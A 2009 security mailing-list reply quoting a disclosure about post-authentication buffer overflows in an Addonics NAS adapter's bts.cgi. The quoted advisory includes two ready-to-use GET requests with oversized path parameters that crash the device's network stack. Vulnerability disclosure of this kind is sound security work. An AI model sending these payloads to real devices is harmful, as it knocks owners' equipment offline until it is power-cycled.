Re: Addonics NAS Adapter (bts.cgi) Remote DoS Exploit (post-auth)
Have any of these buffer overflows been debugged and/or proven
exploitable? Is debugging practical on this device? More details may
suffice the mind.
On Mon, Apr 20, 2009 at 4:12 PM, <mcyr2@xxxxxxx> wrote:
> Remote: Yes
> Local: No
> Credit: Mike Cyr, aka h00die
> Vulnerable: NASU2FW41 Loader 1.17
> Not Vulnerable:
>
> Discussion:
>
> Addonics NAS Adapter Post-Auth DoS
>
> Addonics NAS Adapter is prone to several post authentication buffer
> overflows. Each of these buffer overflows will crash the entire TCP/IP stack
> and the device will have to be power cycled to restore any functionality.
> Addonics currently has implemented GUI level (client side) controls for
> preventing long inputs, but by simply doing a direct HTTP GET request (the
> device doesn't use POST) this can be bypassed.
>
> Addonics was notified of the buffer overflows via ticket 497283 on March 25,
> 2009. Vendor acknowledgment on March 26, 2009.
>
> Exploiting these issues will crash the network stack and create a Denial of
> Service condition.
>
> Firmware NASU2FW41 Loader1.17 are vulnerable; other versions may also be.
>
> Exploit:
>
> http://www.milw0rm.com/exploits/8490
>
> Attackers can use a browser to exploit these issues.
>
> The following GET requests will result in the TCP/IP stack crashing and the
> device requiring a reboot
>
> 1. Bittorrent: Download Path
>
> http://<ip>/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
>
> 2. Bittorent: torrent path
>
> http://<ip>/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC
>
>
>
> References:
>
> Vendor/Product Website: http://www.addonics.com/products/nas/nasu2.asp
>